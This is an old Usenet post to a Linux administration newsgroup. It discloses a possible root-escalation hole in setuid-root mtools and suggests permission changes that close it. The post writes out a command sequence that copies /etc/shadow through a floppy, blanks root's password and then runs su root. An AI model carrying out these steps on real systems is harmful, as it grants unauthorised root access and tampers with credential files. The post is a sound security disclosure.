Setup dependant probable security hole

Setup dependant probable security hole

Post by Disaster prone simplet » Sat, 16 Apr 1994 02:56:26




Path: ecs.ox.ac.uk!m91dps
Newsgroups: comp.os.linux.admin
Subject: Possible security hole (software version/setup dependant)
Expires:
References:
Sender:
Followup-To:
Distribution: world
Organization: Oxford University Undergraduate Engineering & Comp Sci Lab, UK
Keywords:

The following security may or may not be present on your system.
If you have your mtools setuid root the following could well be possible
if you have a mess-dos disc in the floppy drive...
cracker% mwrite /etc/shadow A:
cracker% mread A:shadow hehe
cracker% <upload and edit hehe so root has no password>
cracker% <upload diddled /etc/shadow>
cracker% mwrite diddled A:
cracker% mread diddled /etc/shadow
cracker% su root

If this security hole is present on your system try:
chgrp fdisc /dev/fd*
chmod 660 /dev/fd*
chgrp fdisc /usr/bin/<mtools>
chmod g+s a-s /usr/bin/<mtools>

(The presence or absence of this hole is obviously dependant on what version
of the mtools you use and how it is set up).

Duncan (-:
"I'll try it on my system sometime soon... it was just a cute idea I had"

P.S. if you have / as a dos disc and the emulator setuid root make sure that
      crackers can't use the dos emulator to give you an alternative version
       of things you don't want them to (e.g. /etc/shadow).
X